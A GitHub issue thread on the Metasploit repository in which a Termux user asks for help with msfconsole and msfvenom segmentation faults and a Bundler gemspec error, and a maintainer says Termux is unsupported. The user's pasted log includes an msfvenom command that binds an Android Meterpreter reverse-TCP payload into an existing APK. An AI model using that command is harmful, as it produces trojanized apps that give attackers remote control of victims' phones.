### ISSUE TITLE
Anyone can help me? 

### ISSUE THREAD

**Issue by akiraaranii** [rapid7/metasploit-framework#11508]
[*] Please wait while binding.......🕜

tmuxbunch: line 87: 30600 Segmentation fault      ./msfvenom -x $OUTPUT -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
java.io.FileNotFoundException: /data/data/com.termux/files/home/Tmux-Bunch/unsign/astar.apk (No such file or directory)
        at java.util.zip.ZipFile.open(Native Method)

$ cd ..
$ msfconsole
  [1]    31012 segmentation fault  msfconsole
$ cd ..
$ msfvenom
  [1]    833 segmentation fault  msfvenom

     And then i try something else 

$ cd metasploit-framework
$ msfconsole
 [1]    920 segmentation fault  msfconsole

But, that's same problems

**Comment by Acidical** [comment]
Termux is not officially supported #11023

**Comment by akiraaranii** [comment]
So, what should I do?

**Comment by Acidical** [comment]
Refer to the webpages linked in issue #11023

**Comment by akiraaranii** [comment]
And... For this problems what I can to do? 



msfconsole

[!] There was an error parsing `Gemfile`:
[!] There was an error while loading `grpc.gemspec`: cannot load such file -- grpc/version
Does it try to require a relative path? That's been removed in Ruby 1.9. Bundler cannot continue.

 #  from /data/data/com.termux/files/home/metasploit-framework/grpc.gemspec:4
 #  -------------------------------------------
 #  $LOAD_PATH.push File.expand_path('../src/ruby/lib', __FILE__)
 >  require 'grpc/version'
 #
 #  -------------------------------------------
. Bundler cannot continue.

 #  from /data/data/com.termux/files/home/metasploit-framework/Gemfile:4
 #  -------------------------------------------
 #  #   spec.add_runtime_dependency '<name>', [<version requirements>]
 >  gemspec name: 'metasploit-framework'
 #
 #  -------------------------------------------
